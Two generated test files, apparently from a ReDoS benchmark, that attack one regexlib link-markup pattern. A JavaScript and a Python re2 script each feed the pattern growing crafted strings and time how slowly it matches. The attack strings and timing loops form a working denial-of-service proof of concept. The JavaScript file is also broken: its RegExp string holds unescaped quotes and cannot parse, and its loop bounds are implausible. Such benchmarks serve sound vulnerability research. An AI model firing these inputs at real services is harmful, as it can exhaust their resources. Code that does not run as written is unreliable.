File: regexlib/javascript_test_file/regexlib_1470.js
/* 1470
 * \[link="(?<link>((.|\n)*?))"\](?<text>((.|\n)*?))\[\/link\]
 * POLYNOMIAL
 * nums:3
 * POLYNOMIAL AttackString:"[link=""+""]"*5000+"◎@! _1_POA(i)"
 */
var REGEX = new RegExp("\[link="(?<link>((.|\n)*?))"\](?<text>((.|\n)*?))\[\/link\]")
for(var i = 1; i <= 5000000; i++) {
    var time = Date.now();
    var attack_str = '[link=\"' + '\"]'.repeat(i*10000) + '◎@! _1_POA(i)'
    REGEX.exec(attack_str)
    // REGEX.test(attack_str);
    // attack_str.search(REGEX)
    // attack_str.match(REGEX)
    var time_cost = Date.now() - time;
    console.log(i * 10000 + ": " + time_cost+" ms")
}

File: regexlib/python_re2_test_file/regexlib_1470.py
# 1470
# \[link="(?<link>((.|\n)*?))"\](?<text>((.|\n)*?))\[\/link\]
# POLYNOMIAL
# nums:5
# POLYNOMIAL AttackString:"[link=""+""]"*5000+"◎@! _1_POA(i)"

import re2 as re
from time import perf_counter

regex = """\[link="(?<link>((.|\n)*?))"\](?<text>((.|\n)*?))\[\/link\]"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = "[link=\"" + "\"]" * i * 10000 + "◎@! _1_POA(i)"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *10000}: took {DURATION} seconds!")